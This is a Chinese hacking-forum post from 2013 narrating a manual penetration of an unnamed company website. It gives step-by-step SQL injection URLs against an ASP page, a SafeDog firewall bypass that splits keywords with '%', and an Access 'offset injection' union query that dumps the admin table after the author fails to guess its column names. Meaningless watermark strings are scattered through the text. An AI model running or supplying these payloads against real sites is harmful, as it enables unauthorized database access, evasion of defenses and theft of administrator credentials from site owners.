找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2117|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。' F% G6 N) B) N/ g

( x8 E) g4 o8 m# e8 |% j& K6 w
8 O2 j1 y$ @5 i顺手加个admin- Y2 X; `8 J+ X. o

" Z. Q( T3 z: t6 h" x  ], E  R6 k6 u) R$ ]$ T) P
默认后台。
9 q8 X4 U9 w" Q+ ]% M回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
1 m8 t! k: g# `; u. k* A
$ C5 E9 i; b/ v$ `  S* {: O$ i4 Y# i

2 w3 s( q; x2 f所以就不用御剑扫了,待会直接封IP。- t, L: Z2 }) z0 Y3 p
! ^/ n8 {8 ~; G
用order by语句判断是否存在注入。
5 Y- r2 ^! v, ~7 l% Hhttp://www.xxx.com /product_show.asp?id=997 order by 1% }/ Y% u# _2 z  N0 H' [; ]: A
http://www.xxx.com /product_show.asp?id=997 order by 100
# }& [0 n& c9 Y/ i! r8 F现在存在注入,经测试后发现是9个字段。
0 t) ?" @& I2 }! h' N 4 N. L* o2 `! q9 U, R9 W
接下来进行联合查询,猜是否存在admin表。
& R" r6 P6 [6 Q! o, }. Whttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
+ P+ q9 D4 N! K8 o6 }
- l7 a3 h: S1 \: l
3 }; _+ n) Q+ B
  p' z0 v% ^' L$ q) K在select中间加个%,se%lect绕过安全狗。6 }0 q7 Y- ]9 ?
- M% Q# U5 A, H9 U% ~
( U5 T7 ?4 v# d! J( I
发现存在admin表,然后开始手工猜常用的字段。8 K5 _4 e2 P8 ~' Q' R' f
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。4 ?: Y- |' i7 T% x& I$ ~

/ d9 Y. Y, `5 o( h6 }3 E* t2 w* U% _突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
) |3 _+ U: `7 @/ ? 8 F! y: c% Z6 E/ ~# z" ]
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
2 J: s9 ^: P8 J" {& qhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
# n: }. S* G) M% g, A$ J( J好了,敏感内容出显了。​
- I( A/ k* F; A: ^
* W7 p$ `3 T' L! O& \: Y* ]+ x
2 L) P/ V9 l) R/ q1 R
+ }+ }0 y' ?* s; c5 N1 m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表